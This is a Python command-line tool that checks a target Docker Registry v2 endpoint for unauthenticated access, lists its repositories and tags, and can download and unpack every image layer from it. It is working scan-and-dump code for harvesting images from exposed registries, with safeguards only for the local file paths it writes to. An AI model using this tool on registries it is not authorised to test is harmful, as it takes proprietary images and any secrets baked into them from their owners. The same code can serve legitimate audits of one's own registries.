# -*- coding:utf-8 -*-
import os
import tarfile
import argparse
import requests
# Silence urllib3 warnings; the HTTP requests in this file are sent with verify=False.
requests.packages.urllib3.disable_warnings()
# Directory prefix under which image layers are downloaded and extracted.
CACHE_PATH = "./caches/"
# Timeout, in seconds, passed to every requests.get() call in this file.
TIMEOUT = 5
def manageArgs():
    """Parse the command line and return the resulting namespace.

    The namespace carries ``url`` (positional) plus the mutually exclusive
    options ``dump`` (an image name or None), ``tags`` (bool) and
    ``dump_all`` (bool).
    """
    cli = argparse.ArgumentParser()
    cli.add_argument("url", help="URL")

    # The three actions are alternatives; argparse rejects any combination.
    modes = cli.add_mutually_exclusive_group()
    option_specs = (
        ("--dump", {"metavar": "IMAGENAME", "dest": "dump", "type": str, "help": "ImageName"}),
        ("--tags", {"dest": "tags", "default": False, "help": "list tags", "action": "store_true"}),
        ("--dump_all", {"dest": "dump_all", "help": "dump all", "action": "store_true"}),
    )
    for flag, options in option_specs:
        modes.add_argument(flag, **options)

    return cli.parse_args()
def createDir(directoryName):
    """Create ``directoryName`` (and any missing parents) under CACHE_PATH.

    Args:
        directoryName: Relative path, appended verbatim to CACHE_PATH.

    Returns:
        None. A name containing a ``..`` path segment is refused: a
        message is printed and nothing is created.
    """
    # Split on both separators so "..\\" (Windows) and a bare ".." are caught,
    # not only the literal substring "../".
    segments = directoryName.replace("\\", "/").split("/")
    if ".." in segments:
        print("[-] Hacker!")
        return
    # exist_ok avoids the check-then-create race of exists() + makedirs().
    os.makedirs(f"{CACHE_PATH}{directoryName}", exist_ok=True)
class RegistryUnauth():
    """Probe a Docker Registry v2 HTTP API for unauthenticated access.

    ``check`` is the entry point: it stores the target URL and the
    ``list_tags`` flag on the instance, lists the repositories and, when
    asked to, downloads and unpacks every layer of the selected images
    under CACHE_PATH.
    """

    # Chunk size, in bytes, used when streaming a layer blob to disk.
    _CHUNK_SIZE = 64 * 1024

    def _layerDir(self, image_name, tag):
        """Return the cache sub-directory name used for one image:tag pair."""
        return image_name.replace("/", "_") + "/" + tag.replace(".", "_")

    def getImages(self):
        """List the repositories exposed by ``<target>/v2/_catalog``.

        Each repository is printed; when ``self.list_tags`` is set its tags
        are printed as well.

        Returns:
            The list of repository names, or None when the catalog could
            not be fetched or parsed.
        """
        url = "%s/v2/_catalog" % self.target
        try:
            req = requests.get(url, timeout=TIMEOUT, verify=False)
            repos = req.json()["repositories"]
            images = []
            for repo in repos:
                print("[+]", repo)
                if self.list_tags:
                    self.getTags(repo)
                images.append(repo)
            return images
        except Exception:
            # Best-effort probe: any network/JSON/shape failure means the
            # catalog is not readable without credentials.
            print("[-] Not vulnerability.")
            return None

    def getTags(self, image_name):
        """Fetch the tags of ``image_name``.

        Returns:
            A list of ``{"image": ..., "tag": ...}`` dicts; empty when the
            repository has no tags or the request failed.
        """
        results = []
        url = "%s/v2/%s/tags/list" % (self.target, image_name)
        try:
            req = requests.get(url, timeout=TIMEOUT, verify=False)
            # A repository without tags may be reported as `"tags": null`;
            # treat that as an empty list instead of a failure.
            tags = req.json()["tags"] or []
            for tag in tags:
                if self.list_tags:
                    print(f" [*] {image_name}:{tag}")
                results.append({"image": image_name, "tag": tag})
            if self.list_tags:
                print()
        except Exception as e:
            print("[-] Get tags failed,", str(e))
        return results

    def getBlob(self, image_name, tag):
        """Download every layer referenced by the manifest of image_name:tag.

        Both manifest layouts are understood: schema 1 (``fsLayers`` entries
        with ``blobSum``) and schema 2 (``layers`` entries with ``digest``).
        Errors are printed, never raised.
        """
        url = "%s/v2/%s/manifests/%s" % (self.target, image_name, tag)
        try:
            req = requests.get(url, timeout=TIMEOUT, verify=False)
            manifest = req.json()
            if "fsLayers" in manifest:
                digests = [layer["blobSum"] for layer in manifest["fsLayers"]]
            else:
                digests = [layer["digest"] for layer in manifest["layers"]]
            createDir(self._layerDir(image_name, tag))
            # A manifest may list the same blob several times; fetch each
            # digest once, keeping the manifest order.
            for digest in dict.fromkeys(digests):
                self.downloadSha(image_name, tag, digest)
        except Exception as e:
            print("[-]", str(e))

    def downloadSha(self, image_name, version, sha256):
        """Download one layer blob and unpack it under CACHE_PATH.

        Args:
            image_name: Repository name as used in the registry URL.
            version: Tag the layer belongs to (selects the cache directory).
            sha256: Digest string of the form ``<algorithm>:<value>``.

        The archive is streamed to ``<value>.tar.gz`` inside the image's
        cache directory, extracted into a sibling directory ``<value>`` and
        then removed. Download and extraction errors are printed.
        """
        layer_dir = self._layerDir(image_name, version)
        name = sha256.split(":")[1]
        # The digest comes from the remote server and becomes a file name;
        # refuse anything that could point outside the layer directory.
        if not name or "/" in name or "\\" in name or name in (".", ".."):
            print(" [-] Download fail: invalid digest", sha256)
            return
        archive_path = f"{CACHE_PATH}{layer_dir}/{name}.tar.gz"
        extract_path = f"{CACHE_PATH}{layer_dir}/{name}"
        url = f"{self.target}/v2/{image_name}/blobs/{sha256}"
        try:
            # stream=True keeps the blob out of memory; the context manager
            # releases the connection once the body has been written.
            with requests.get(url, timeout=TIMEOUT, verify=False, stream=True) as req:
                if req.status_code != 200:
                    print(" [-] Download fail:", req.status_code)
                    return
                print(f" [+] Downloading : {name}")
                with open(archive_path, 'wb') as out:
                    for chunk in req.iter_content(chunk_size=self._CHUNK_SIZE):
                        out.write(chunk)
            with tarfile.open(archive_path) as tf:
                if hasattr(tarfile, "tar_filter"):
                    # The archive is untrusted: the "tar" filter refuses
                    # members that would land outside extract_path while
                    # still allowing the links found in image layers.
                    tf.extractall(extract_path, filter="tar")
                else:
                    # Older interpreters have no extraction filters.
                    tf.extractall(extract_path)
            os.remove(archive_path)
        except Exception as e:
            # Best effort per layer: one broken blob must not stop the dump.
            print(e)

    def check(self, args):
        """Run the scan described by the parsed command-line ``args``.

        Reads ``args.url``, ``args.tags``, ``args.dump`` and
        ``args.dump_all``. With ``dump`` only that image is dumped; with
        ``dump_all`` every image from the catalog is dumped; otherwise the
        catalog is only listed.
        """
        self.target = args.url.strip().strip("/")
        self.list_tags = args.tags
        if args.dump:
            images = [args.dump]
        else:
            images = self.getImages()
            if images is None:
                # getImages already reported the failure.
                return
            if not images:
                print("[-] 0 public images found.")
                return
        # --dump and --dump_all are mutually exclusive, so either one must
        # be enough to start dumping.
        if not (args.dump or args.dump_all):
            return
        for image in images:
            for tag in self.getTags(image):
                print("[+] Dumping : %s:%s" % (tag["image"], tag["tag"]))
                self.getBlob(tag["image"], tag["tag"])
if __name__ == "__main__":
    # Script entry point: parse the CLI first, then hand the options to the scanner.
    cli_options = manageArgs()
    RegistryUnauth().check(cli_options)
# All comments (2)  -- web-page residue from where this script was copied; not part of the program.